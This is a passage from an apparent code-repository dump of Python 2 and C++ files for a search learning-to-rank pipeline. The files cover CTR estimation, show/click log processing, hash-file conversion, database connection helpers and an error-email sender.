self.fileconfig.get(section,\"weight_index\").split(',')\n\t\tlenght = len(weight_list)\n\t\tfor i in range(lenght):\n\t\t\tarray = weight_list[i].strip().split(':')\n\t\t\tweight_index = int(array[0])\n\t\t\tweight_name = array[1].strip()\n\t\t\tself.weight_index[weight_index] = weight_name\n\n\tdef initWeights(self, filepath):\n\t\tfile = None\n\t\ttry:\n\t\t\tk = 0\n\t\t\tfile = open(filepath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\titem_name = self.weight_index[k]\n\t\t\t#\tprint item_name\n\t\t\t\tself.weight_value[item_name] = float(line.strip())\n\t\t\t\tk += 1\n\t\texcept Exception,ex:\n\t\t\tself.logger.error(ex)\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\t\traise Exception, ex\t\t\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\n\tdef normalizedFeature(self, val, max_val = 2209, is_log = True):\n\t\tif val > max_val:\n\t\t\treturn 1\n\t\tif val <= 0:\n\t\t\treturn 0\n\n\t\tif is_log:\n\t\t\tval = math.log(val + 1)\n\t\t\tmax_val = math.log(max_val + 1)\n\t\treturn val/max_val\n\n\tdef loadLogData(self, srcfilepath, disfilepath):\n\t\tsrcfile = None\n\t\tdisfile = None\n\t\ttry:\n\t\t\tsrcfile = open(srcfilepath, \"r\")\n\t\t\tdisfile = open(disfilepath, \"w+\")\n\t\t\tdefault_ctr = 1.0/(1 + math.exp(- self.weight_value['bias']))\n\t\t\tdisfile.write(\"%s\\t%s\\n\" % (-1, default_ctr))\n\t\t\twhile True:\n\t\t\t\tline = srcfile.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tarray = 
line.strip(\"\\n\").split(\"\\t\")\n\t\t\t\tlenght = len(array)\n\t\t\t\tif lenght != self.feature_num:\n\t\t\t\t\tcontinue\n\n\t\t\t\tpid = str2int(array[0])\n\t\t\t\tpid_feature = {}\n\t\t\t\tfor i in range(1, self.feature_num):\n\t\t\t\t\titem_name = self.feature_index[i - 1]\n\t\t\t\t\tval = round(str2float(array[i]), 3)\n\t\t\t\t\tpid_feature[item_name] = val\n\t\t\t\n\t\t\t\tpid_process_feature = self.featureProcess(pid_feature)\n\t\t\t\tpid, ctr = self.estimateCTR(pid, pid_process_feature)\n\t\t#\t\tself.product_info[pid] = pid_feature\n\t\t#\t\tself.product_norm_info[pid] = pid_process_feature\n\t\t\t\t\t\t\n\t\t\t\tdisfile.write(\"%s\\t%s\\n\" % (pid, ctr))\n\t\texcept Exception,ex:\n\t\t\tself.logger.error(ex)\n\t\t\tprint 'Can not connect to dbserver'\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\t\traise Exception, ex\n\t\tfinally:\n\t\t\tif srcfile:\n\t\t\t\tsrcfile.close()\n\t\t\tif disfile:\n\t\t\t\tdisfile.close()\n\n\tdef featureProcess(self, pid_feature):\t\n\t\tpid_processed_feature = {}\n\n\t\tis_new = str2int(pid_feature['is_new'])\n\t\tpid_processed_feature['is_new'] = is_new\t\t\n\n\t\tis_promo = str2int(pid_feature['is_discount'])\n\t\tpid_processed_feature['is_discount'] = is_promo\n\n\t\tscore = str2float(pid_feature['score'])\n\t\tif score >= 8:\n\t\t\tscore = 1\n\t\telse:\n\t\t\tscore = 0\n\t\tpid_processed_feature['score'] = score\n\n\t\td_uv = self.normalizedFeature(pid_feature['d_uv'], 50, False)\n\t\tpid_processed_feature['d_uv'] = d_uv\n\n\t\tw_uv = self.normalizedFeature(pid_feature['w_uv'])\n\t\tpid_processed_feature['w_uv'] = w_uv\n\n\t\tm_uv = self.normalizedFeature(pid_feature['m_uv'])\n\t\tpid_processed_feature['m_uv'] = m_uv\n\n\t\tn_comm = self.normalizedFeature(pid_feature['review_total'])\n\t\tpid_processed_feature['review_total'] = n_comm\n\n\t\tn_keep = self.normalizedFeature(pid_feature['n_keep'])\t\t\n\t\tpid_processed_feature['n_keep'] = n_keep\n\n\t\treturn pid_processed_feature\n\n\n\tdef estimateCTR(self, pid, pid_feature_dt):\n\t\tctr = self.weight_value['bias']\n\t\tfor k,w in self.weight_value.items():\n\t\t\tif k == 'bias':\n\t\t\t\tcontinue\n\t\t\tfeature_val = 0\n\t\t\tif k in pid_feature_dt:\n\t\t\t\tfeature_val = pid_feature_dt[k]\n\t\t\tctr += w*feature_val\n\t\treturn pid, 1.0/(1 + math.exp(0 - ctr))\n\n\tdef run(self, weightpath, srcfilepath, disfilepath):\n\t\tself.initWeights(weightpath)\n\t\t#print self.weight_value\n\t\tself.loadLogData(srcfilepath, disfilepath)\n\t\t\ndef str2float(f_str):\n\tval = 0\n\ttry:\n\t\tval = float(f_str)\n\t\tif val < 0:\n\t\t\tval = 0\n\texcept:\n\t\tval = 0\n\treturn val\n\ndef str2int(i_str):\n\tval = 0\n\ttry:\n\t\tval = int(i_str)\n\t\tif val < 0:\n\t\t\tval = 0\n\texcept:\n\t\tval = 0\n\treturn val\t\n\n\ndef main():\n\tif len(sys.argv) != 2:\n\t\treturn\n\tcurday = sys.argv[1]\n\tweightpath = \"../data/model.txt\"\n\tsrcfilepath = \"../data/product_info_%s\" % curday\n\tdisfilepath = \"../data/pid_ctr\"\n\to = CaculateFeatures4Model()\n\to.run(weightpath, srcfilepath, disfilepath)\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.5661393404006958, "alphanum_fraction": 0.5792662501335144, "avg_line_length": 21.49242401123047, "blob_id": "6a037f7bc6cf5600813f699c47bd0b1c7d04a7a5", "content_id": "6610c22f43c7c37a9d5a027e5021137730f8ab8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2971, "license_type": "no_license", "max_line_length": 73, "num_lines": 132, "path": "/bin/process_show_click_data.py", 
"repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "\n\nclass CalShowClick():\n\tdef __init__(self):\n\t\tself.query_click = {}\n\t\tself.query_show = {}\n\t\tself.query_position = {}\n\t\tself.query_searchtime = {}\n\n\tdef getClickData(self, srcpath):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(srcpath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\tarray = line.strip().split('\\t')\n\t\t\t\tquery = array[0].replace(\" \",\"\").replace(\"\\t\", \"\").replace(\"\\n\", \"\");\n\t\t\t\tdict_pid_click = {}\n\t\t\t\tfor i in range(1, len(array)):\n\t\t\t\t\tpid_click_str = array[i].strip().split(':')\n\t\t\t\t\tif len(pid_click_str) != 2:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tpid = str2int(pid_click_str[0])\n\t\t\t\t\tn_click = str2int(pid_click_str[1])\n\t\t\t\t\tdict_pid_click[pid] = n_click\n\t\t\t\t\t\n\t\t\t\tif query not in self.query_click:\n\t\t\t\t\tself.query_click[query] = dict_pid_click\n\t\t\t\t#print query\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\n\tdef getShowData(self, srcpath):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(srcpath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\n\t\t\t\tarray = line.strip().split('|')\n\t\t\t\tlenght = len(array)\n\t\t\t\tif lenght < 2:\n\t\t\t\t\tcontinue\n\n\t\t\t\tquery = array[0].replace(\" \",\"\").replace(\"\\t\", \"\");\n\t\t\t\tn_search = array[1]\n\t\t\t\tdict_pid_show = {}\n\t\t\t\tdict_pid_pos = {}\n\t\t\t\tfor i in range(2, lenght):\n\t\t\t\t\ttmp_str = array[i].strip().split(':')\n\t\t\t\t\tif len(tmp_str) != 3:\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\tpid = str2int(tmp_str[0])\n\t\t\t\t\tpos = str2int(tmp_str[1])\n\t\t\t\t\tn_show = str2int(tmp_str[2])\n\t\t\t\t\tdict_pid_show[pid] = n_show\n\t\t\t\t\tdict_pid_pos[pid] = pos\n\n\t\t\t\tself.query_show[query] = dict_pid_show\n\t\t\t\tself.query_searchtime[query] = n_search\n\t\t\t\tself.query_position[query] = dict_pid_pos\n\t\t\t\t\n\t\t\t\t#print query\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\tdef saveData(self, dispath):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(dispath, \"w+\")\n\t\t\tfor query, pid_show_dict in self.query_show.items():\n\n\t\t\t\tn_search = 0\n\t\t\t\tif query in self.query_searchtime:\n\t\t\t\t\tn_search = self.query_searchtime[query]\n\t\t\t\t\n\t\t\t\tfor pid, n_show in pid_show_dict.items():\n\t\t\t\t\tpos = self.query_position[query][pid]\n\t\t\t\t\tn_click = 0\n\t\t\t\t\tif query in self.query_click:\n\t\t\t\t\t\tif pid in self.query_click[query]:\n\t\t\t\t\t\t\tn_click = self.query_click[query][pid]\n\n\t\t\t\t\tfile.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % (query,\\\n\t\t\t\t\t\t n_search, pid, pos, n_show, n_click))\n\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\t\t\t\t\n\ndef str2int(i_str):\t \n\tval = 0\t\t\t\t\n\ttry:\t\t\t\t\t\n\t\tval = int(i_str)\t \n\t\tif val < 0:\t\t\t\n\t\t\tval = 0\t\t\t \n\texcept:\t\t\t\t\t \n\t\tval = 0\t\t\t\t\t\n\treturn val\n\n\ndef main():\n\tprint \"go ...\"\n\to = CalShowClick()\n\tshow_filepath = \"../data/show_click_tmp_data/log-20131031_search.clean\"\n\tclick_filepath = \"../data/show_click_tmp_data/search-131031\"\n\tdispath = \"../data/query_data\"\n\tprint \"show time ...\"\n\to.getShowData(show_filepath)\n\tprint \"click time ...\"\n\to.getClickData(click_filepath)\t\n\tprint \"save data 
..\"\n\to.saveData(dispath)\n\tprint \"ok !\"\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.617451548576355, "alphanum_fraction": 0.636565089225769, "avg_line_length": 23.385135650634766, "blob_id": "16bd50ac7769db0e8b4081c6ffd31a5cf8b70da7", "content_id": "70f3bbfe20d771d26c7656c4a8dcfc9016500db5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3610, "license_type": "no_license", "max_line_length": 83, "num_lines": 148, "path": "/bin/main.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport time, datetime\n\nfrom get_product_info import ProductInfo\nfrom process_show_click_data import CalShowClick\n\ndef saveData(product_info_obj, show_click_obj, dispath):\n\tfile = None\n\ttry:\n\t\tfile = open(dispath, \"w+\")\n\t\tfor query, pid_show_dict in show_click_obj.query_show.items():\n\n\t\t\tn_search = 0\n\t\t\tif query in show_click_obj.query_searchtime:\n\t\t\t\tn_search = show_click_obj.query_searchtime[query]\n\n\t\t\tfor pid, n_show in pid_show_dict.items():\n\t\t\t\tpos = show_click_obj.query_position[query][pid]\n\t\t\t\tn_click = 0\n\t\t\t\tif query in show_click_obj.query_click:\n\t\t\t\t\tif pid in show_click_obj.query_click[query]:\n\t\t\t\t\t\tn_click = show_click_obj.query_click[query][pid]\n\t\t\t\t\n\t\t\t\tproduct_info = \"0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\"\n\t\t\t\tif pid in product_info_obj.pid_info:\n\t\t\t\t\tproduct_info = product_info_obj.pid_info[pid]\n\n\t\t\t\tfile.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % (query,\\\n\t\t\t\t\t n_search, pid, pos, n_show, n_click, product_info))\n\n\texcept Exception,ex:\n\t\tprint ex\n\tfinally:\n\t\tif file:\n\t\t\tfile.close()\t\n\n\ndef prepareSVMRankFile(filepath, disfilepath, lenght, feature_num, feature_index):\n\tsrcfile = None\n\tdisfile = None\n\n\tqid = 0\n\tquery_old = None\n\ttry:\n\t\tsrcfile = open(filepath, 'r')\n\t\tdisfile = open(disfilepath, 'a+')\n\t\tflag = 0\n\t\twhile True:\n\t\t\tline = srcfile.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tarray = line.strip('\\n').split(\"\\t\")\n\n\t\t\tif len(array) != feature_num:\n\t\t\t\tcontinue\n\n\t\t\tquery = array[0]\n\t\t\tshow_time = int(array[4])\n\t\t\tclick_time = int(array[5])\n\t\t\t\n\t\t\tif query != query_old:\n\t\t\t\tqid += 1\n\t\t\t\tquery_old = query\n\t\t\t\tflag = 0\n\t\t\t\tif int(array[6]) == 0:\n\t\t\t\t\tflag = 1\n\n\t\t\tif flag == 1:\n\t\t\t\tcontinue\n\n\t\t\t#str = \"%s qid:%s\" % (ctr, qid)\n\t\t\tstr = \"%s %s qid:%s\" % (click_time, show_time, qid)\n\t\t\tfor i in range(lenght):\n\t\t\t\tindex_id = feature_index[i]\n\t\t\t\tstr = \"%s %s:%s\" % (str, i+1, array[index_id])\n\n\t\t\tdisfile.write(\"%s\\n\" % str)\n\texcept Exception,ex:\n\t\tprint ex\n\tfinally:\n\t\tif srcfile:\n\t\t\tsrcfile.close()\n\t\tif disfile:\n\t\t\tdisfile.close()\n\ndef getSpecifiedDay(curday, n):\n\t'''\n\tget the n days ago\n\t'''\n\ttry:\n\t\tarray = curday.split('-')\n\t\tif len(array) != 3:\n\t\t\treturn\n\t\tyear = int(array[0])\n\t\tmonth = int(array[1])\n\t\tday = int(array[2])\n\t\tpreday = datetime.datetime(year, month, day) - datetime.timedelta(n)\n\t\treturn preday.strftime(\"%Y%m%d\")\n\texcept Exception ,ex:\n\t\tprint 'get preday error~~'\n\t\traise ex\n\treturn\n\n\ndef main():\n\t\n\tprint \"go ...\"\n\tdata_path = \"../data\"\n\t\n\tcurday = datetime.datetime.now().strftime('%Y-%m-%d')\n\tcurday = getSpecifiedDay(curday, 1)\n\n\tprint \"product info 
...\"\t\n\tproduct_info_obj = ProductInfo()\n\tproduct_info_obj.run()\n\t\n\tprint \"caculate show ...\"\n\tshow_click_obj = CalShowClick()\n\t\n\tshow_filename = \"log-%s_search.clean\" % curday\n\tshow_filepath = \"%s/temp_data/%s\" % (data_path, show_filename)\n\tshow_click_obj.getShowData(show_filepath)\n\n\tprint \"caculate click...\"\t\n\tclick_filename = \"search-%s\" % curday[2:]\n\tclick_filepath = \"%s/temp_data/%s\" % (data_path, click_filename)\n\tshow_click_obj.getClickData(click_filepath)\n\n\tprint \"save search info ...\"\n\tsearch_log_filename = \"search_log_%s\" % curday\n\tdispath = \"%s/%s\" % (data_path, search_log_filename)\n\tsaveData(product_info_obj, show_click_obj, dispath)\n\n#\tprint \"conver data to svmrank format ...\"\t\n#\tsvmrank_filename = \"svmrank_data_%s\" % curday\n#\tsvmrank_filepath = \"%s/%s\" % (data_path, svmrank_filename)\n#\tlenght = 16\n#\tfeature_num = 23 \n#\tfeature_index = [7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22]\t\n#\tprepareSVMRankFile(dispath, svmrank_filepath, lenght, feature_num, feature_index)\n\tprint \"end !\"\t\n\t\n\n\n\nif __name__ == \"__main__\":\n\tmain()\t\n" }, { "alpha_fraction": 0.6327652335166931, "alphanum_fraction": 0.64211106300354, "avg_line_length": 21.456790924072266, "blob_id": "cda485fde8ab3bbb57ccc4fefda5e4a47949cc2a", "content_id": "ee02209925a875476bbef292a49f654d2985d8cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1819, "license_type": "no_license", "max_line_length": 91, "num_lines": 81, "path": "/bin/map2staticmap.cpp", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#include<iostream>\n#include<string>\n#include<map>\n#include<vector>\n#include <fstream>\n\n#include\"nokey_static_hash.h\"\n\nusing namespace std;\n\n\ninline void split(const string& str, const string& sp, vector<string>& out) {\n\tout.clear();\n\tstring s = str;\n\tsize_t beg, end;\n\twhile (!s.empty()) {\n\t\tbeg = s.find_first_not_of(sp);\n\t\tif (beg == string::npos) {\n\t\t\tbreak;\n\t\t}\n\t\tend = s.find(sp, beg);\n\t\tout.push_back(s.substr(beg, end - beg));\n\t\tif (end == string::npos) {\n\t\t\tbreak;\n\t\t}\n\t\ts = s.substr(end, s.size() - end);\n\t}\n}\n\nint main(int argc, char** argv)\n{\n\tstring srcfilepath = \"../data/pid_ctr\"; //srcfile path\n\tifstream fin(srcfilepath.c_str());\n\tif(!fin)\n\t{\n\t\t//LOG_MSG_INFO(\"\\topen srcfile:pid_ranking_val.txt fail\");\n\t\tcout<<\"open srcfile:search_data_log fail\"<<endl;\n\t\treturn -1;\n\t}\n\n\t//tmp map for read data from srcfile to memory\n\tmap<int, double> m_pid_rankvalue;\n\tstring line;\n\twhile(getline(fin, line)){\n\t\tvector<string> tmp_vec;\n\t\tsplit(line, \"\\t\", tmp_vec);\n\t\tif(tmp_vec.size() != 2)\n\t\t{\n\t\t\tcontinue;\n\t\t}\n\n\t\tint pid = atoi(tmp_vec[0].c_str());\n\t\tdouble rank_val = atof(tmp_vec[1].c_str());\n\n\t\tm_pid_rankvalue[pid] = rank_val;\n\t}\n\n\tstatic_hash_map<int, double> shm_pid_rankvalue; //static_hash_map \n\tif(shm_pid_rankvalue.container_to_hash_file(m_pid_rankvalue, 15, \"../data/pid2rankvalue\"))\n\t{\n\t\t//LOG_MSG_INFO(\"\\twrite hash file success\");\n\t\tcout<<\"write hash file success\"<<endl;\n\t}\n\telse\n\t{\n\t\t//LOG_MSG_ERROR(\"\\twrite hash file fail!\");\n\t\tcout<<\"write hash file fail\"<<endl;\n\t}\n\n\t/*\t\n\tcout<<\"i am here\"<<endl;\n\tstatic_hash_map<int, double> shm_pid2value;\n \tshm_pid2value.load_serialized_hash_file(\"../data/pid2rankvalue\", 
0);\n\tcout<<shm_pid2value.size()<<endl;\n\tcout<<shm_pid2value[479]<<endl;\n\t//LOG_MSG_INFO(\"WRITE HASH VALUE TO FILE END\");\n\t*/\n\tcout<<\"WRITE HASH VALUE TO FILE END\"<<endl;\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.43412625789642334, "alphanum_fraction": 0.4387008249759674, "avg_line_length": 29.774648666381836, "blob_id": "3de1427f1028b2030378b24a276093caa3231e65", "content_id": "0b6b82415e95650f56d8c6dd58569aab4607e4f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2280, "license_type": "no_license", "max_line_length": 110, "num_lines": 71, "path": "/lib/db_factory.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf8\n\nimport sys\nimport time\n\nfrom data_access_object import DataObject\n\nclass DBFactory(object):\n '''\n 多次连接数据库公用方法\n CONN_NUM 连接次数\n SLEEP_TIME 每次中断时间\n '''\n CONN_NUM = 3\n SLEEP_TIME = 5 \n\n @staticmethod\n def Connect(dbtype, host = '', dsn = '', database = '', charset = '', user = '', password = '', port = 0):\n '''\n 输入连接参数连接数据库\n '''\n num = 0\n db_conn = None\n\n while(True):\n try:\n num += 1\n db_conn = DataObject.Connect(dbtype, host, dsn, database, charset, user, password, port)\n return db_conn\n except Exception,ex:\n if num <= DBFactory.CONN_NUM:\n time.sleep(DBFactory.SLEEP_TIME)\n num += 1\n else:\n raise Exception, '(DB connect Error)%s' % ex\n \n\n @staticmethod\n def connect_conf(config,dbkey):\n '''\n 输入连接conf,以及连接对应的才conf中key连接\n '''\n num = 0\n db_conn = None\n\n while(True):\n try:\n num += 1\n db_conn = DBFactory._get_connect(config,dbkey)\n return db_conn\n except Exception,ex:\n if num <= DBFactory.CONN_NUM:\n time.sleep(DBFactory.SLEEP_TIME)\n num += 1\n else:\n raise Exception, '(DB connect Error)%s' % ex\n\n @staticmethod\n def _get_connect(config,dbkey):\n db_type = config.get(dbkey, 'db_type')\n db_conf = eval(config.get(dbkey, 'db_conf'))\n db_conn = DataObject.Connect(db_type,\n host = db_conf.get('host'),\n dsn = db_conf.get('dsn',''),\n database = db_conf.get('db'),\n charset = db_conf.get('charset',''),\n user = db_conf.get('user'),\n password = db_conf.get('passwd'),\n port = db_conf.get('port'))\n return db_conn\n\n" }, { "alpha_fraction": 0.6465652585029602, "alphanum_fraction": 0.6523334980010986, "avg_line_length": 19.717391967773438, "blob_id": "a4365870058e2be2c2811acacd146a69dc4de37a", "content_id": "d063bdd34224b3b3f0addbaa4256b7ab2ad6440c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2051, "license_type": "no_license", "max_line_length": 94, "num_lines": 92, "path": "/lib/mail_sender.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf8\n\n## Author : xiaominggege\n## Modited: liuxufeng\n## last change time: 2012-08-21\n## work for: 发送错误邮件,邮件内容包含了traceback信息\n## 不支持:\n##\t 附件,抄送\n\nimport os\nimport sys\nimport traceback\nimport inspect\nimport datetime\nimport smtplib, mimetypes\nfrom email.MIMEText import MIMEText\n\n\nclass MailSender(object):\n\t'''\n\t向邮箱发送错误信息\n\t用法:MailSender().SendMail(receiverlist, sub = 'AntiFraud ERROR', content= 'Error info')\n\t'''\n\tdef __init__(self):\n\t\tself.frm = \"[email protected]\"\n\t\tself.message = '' # restore the info of traceback\n\t\tself.errFilePath = ''\n\t\n\tdef write(self, str):\n\t\t'''\n\t\t把traceback信息存储必须的函数\n\t\t'''\n\t\tself.message += str\n\n\tdef 
__getContent(self):\n\t\t'''\n\t\t得到traceback信息\n\t\t'''\n\t\ttraceback.print_exc(file = self)\n\n\tdef __getReceiverList(self, receivers) :\n\t\t'''\n\t\t得到收件人列表\n\t\t'''\n\t\tif isinstance(receivers, list):\n\t\t\treturn ';'.join(receivers)\n\t\treturn receivers\n\n\tdef __getErrFilePath(self):\n\t\t'''\n\t\t得到发生error的文件的路径\n\t\t'''\n\t\tn = len(inspect.stack())\n\t\tcurrent_file = inspect.stack()[n-1][1]\n\t\treturn os.path.abspath(current_file)\n\t\n\tdef sendMail(self, receiver, sub = 'AntiFraud ERROR', content= 'Error info'):\n\t\t'''\n\t\t发送邮件\n\t\t'''\n\t\treceiverlist = self.__getReceiverList(receiver)\n\t\tself.__getContent()\n\t\tself.errFilePath = self.__getErrFilePath()\n\t\tcontent = \">>>%s<<<%s%s%s%s\" % (content, '\\nin: ',str(self.errFilePath), '\\n', self.message)\n\t\ttry:\n\t\t\tmsg = MIMEText(content)\n\t\t\tmsg['From'] = self.frm\n\t\t\tmsg['To'] = receiverlist\n\t\t\tmsg['Subject'] = sub\n\t\t\tsmtp_server = smtplib.SMTP('localhost')\n\t\t\tsmtp_server.sendmail(self.frm, receiver, msg.as_string())\n\t\t\tsmtp_server.quit()\n\t\texcept Exception, ex:\n\t\t\tprint 'Error when sending email'\n\t\t\traise ex\n\t#\n\ndef test():\n\treceiver = ['[email protected]']\n\tmm = MailSender()\n\ttry:\n\t\ta = int('')\n\texcept Exception, ex:\n\t\t#sub = 'Error'\n\t\t#content = 'ERror when program running'\n\t\tprint ex\n\t\tmm.sendMail(receiver)\n\n\t\nif __name__ =='__main__':\n\ttest()\n\n" }, { "alpha_fraction": 0.6179859042167664, "alphanum_fraction": 0.6268935203552246, "avg_line_length": 23.7009220123291, "blob_id": "281afe51dea68b139d29ff8b3e67102d6a478fe4", "content_id": "60cdf43b8c582f2da9e1a56e487ea4e71ca1befa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20350, "license_type": "no_license", "max_line_length": 119, "num_lines": 759, "path": "/lib/data_access_object.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n Author:yuecong\n UploadTime:2012-07-22 17:07:00\n'''\n\nimport re\nimport sys\nimport ConfigParser\n#sys.path.append('/usr/local/hive')\n\n#from hive_service import ThriftHive\n#from hive_service.ttypes import HiveServerException\nfrom thrift import Thrift\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\n \nclass DataObject(object):\n\tdef __init__(self):\n\t\tself.conn_str = []\n\t\tself.conn = None\n\t\tself.cursor = None\n\t\tself.rowcount = 0\n\t\tself.config = None\n\t\tself.tmpfile = ''\n\t\tself.debug_mode = False \n\t\treload(sys)\n\t\tsys.setdefaultencoding('utf8')\n\n\n\tdef connect(self,dbtype, host = '', dsn = '', database = '', charset = '', user = '', password = '', port = 0):\n\t\t'''\n\t\t\t连接指定的数据源,MySQL,SQLServer,Oracle,Hive\n\t\t\tparams:\n\t\t\tdbtype: 'mysql', 'mssql', 'oracle', 'hive'\n\t\t\thost: 域名或ip地址\n\t\t\tdsn: 连接oracle数据库专用\n\t\t\tcharset: 如果原生的驱动支持charset选项,则可以设置,MySQLdb, pymssql支持, cx_Oracle与HIveThrift不支持\n\t\t'''\n\t\tself.conn_str = [dbtype,host,user,password,database,port,charset]\n\n\t\t_dbtype = dbtype.lower()\n\t\t_host = host\n\t\t_dsn = dsn\n\t\t_user = user\n\t\t_password = password\n\t\t_db = database\n\t\t_port = int(port)\n\t\t_charset = charset\n\n\t\tif _dbtype == 'mysql':\n\t\t\timport MySQLdb\n\t\t\tself.conn = MySQLdb.connect(host = _host, db = _db, port = _port, charset = _charset, \\\n\t\t\t\t\t\t\t\t user = _user, passwd = _password, use_unicode = 'True')\n\t\tif _dbtype == 
'mssql':\n\t\t\timport pymssql\n\t\t\tself.conn = pymssql.connect(host = _host, user = _user, password = _password, database = _db, charset = _charset) \n\n\t\tif _dbtype == 'oracle':\n\t\t\timport cx_Oracle\n\t\t\tself.conn = cx_Oracle.connect(user = _user, password = _password, dsn = _dsn)\n\n\t\tif _dbtype == 'hive':\n\t\t\ttry:\n\t\t\t\ttransport = TSocket.TSocket(host = _host, port = _port)\n\t\t\t\tself.conn = TTransport.TBufferedTransport(transport)\n\t\t\t\tself.conn.open()\n\t\t\texcept Thrift.TException, tx:\n\t\t\t\tsys.stderr.write('Hive Connection Error:%s\\n' % (tx))\n\t\t\t\tself.close()\n\t\t\t\traise SystemError, tx\n\t\treturn self\n\n\n\tdef Connect(dbtype, host = '', dsn = '', database = '', charset = '', user = '', password = '', port = 0):\n\t\t'''\n\t\t\tconnect函数的静态版\n\t\t\t返回一个DataObject连接对象\n\t\t'''\n\t\t_dbtype = dbtype.lower()\n\t\t_host = host\n\t\t_dsn = dsn\n\t\t_user = user\n\t\t_password = password\n\t\t_db = database\n\t\t_port = int(port)\n\t\t_charset = charset\n\n\t\tobj = DataObject()\n\t\treturn obj.connect(_dbtype, _host, _dsn, _db, _charset, _user, _password, _port)\n\tConnect = staticmethod(Connect)\n\n\n\tdef get_origin_conn(self):\n\t\t'''\n\t\t\t返回原生的连接对象,从而可以使用不同具体驱动的特性\n\t\t\t例如 mysql连接的DataObject对象将返回 MySQLdb对象,从而\n\t\t\t可以使用MySQLdb.connection的成员函数(方法)\n\t\t'''\n\t\treturn self.conn\n\n\n\tdef get_cursor(self):\n\t\t'''\n\t\t\t[deplicate function]\n\t\t\t在连接上获取一个cursor,最好不要直接调用\n\t\t'''\n\t\tif self.cursor:\n\t\t\tself.close_cursor()\n\n\t\tif self.conn_str[0] in ['mssql','oracle']:\n\t\t\tself.cursor = self.conn.cursor()\n\n\t\tif self.conn_str[0] in ['mysql']:\n\t\t\timport MySQLdb\n\t\t\tself.cursor = self.conn.cursor(cursorclass=MySQLdb.cursors.SSCursor)\n\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\tprotocol = TBinaryProtocol.TBinaryProtocol(self.conn)\n\t\t\t\tself.cursor = ThriftHive.Client(protocol)\n\t\t\texcept Thrift.TException, ex:\n\t\t\t\tself.close()\n\t\t\t\tsys.stderr.write('%s\\n' % (ex))\n\t\t\t\traise SystemError, ex\n\t\treturn self.cursor\n\n\n\tdef close_cursor(self):\n\t\t'''\n\t\t\t[deplicate function]\n\t\t\t关闭此连接对象上的cursor\n\t\t'''\n\t\tif not self.cursor:\n\t\t\treturn\n\t\ttry:\n\t\t\tif self.conn_str[0] in ['mysql','mssql','oracle']:\n\t\t\t\tself.cursor.close()\n\t\t\t\tself.cursor = None\n\t\t\tif self.conn_str[0] == 'hive':\n\t\t\t\tself.cursor.clean()\n\t\texcept Exception,ex:\n\t\t\tprint ex \n\n\tdef _execute(self,cursor,sql):\n\t\t# 每次execute执行之前,将上次缓存的游标影响行数清空\n\t\tself.rowcount = 0\n\t\tif self.conn_str[0] in ['mysql','mssql','oracle']:\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql)\n\t\t\texcept Exception, ex:\n\t\t\t\tsys.stderr.write('SQL or Interface Error:%s\\n[SQL]:%s\\n' % (ex,sql))\n\t\t\t\traise SystemError, 'SQL or Interface Error:%s\\n[SQL]:%s\\n' % (ex,sql)\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql)\n\t\t\texcept Thrift.TException, ex:\n\t\t\t\tsys.stderr.write('SQL or Interface Error:%s\\n[SQL]:%s\\n' % (ex,sql))\n\t\t\t\traise 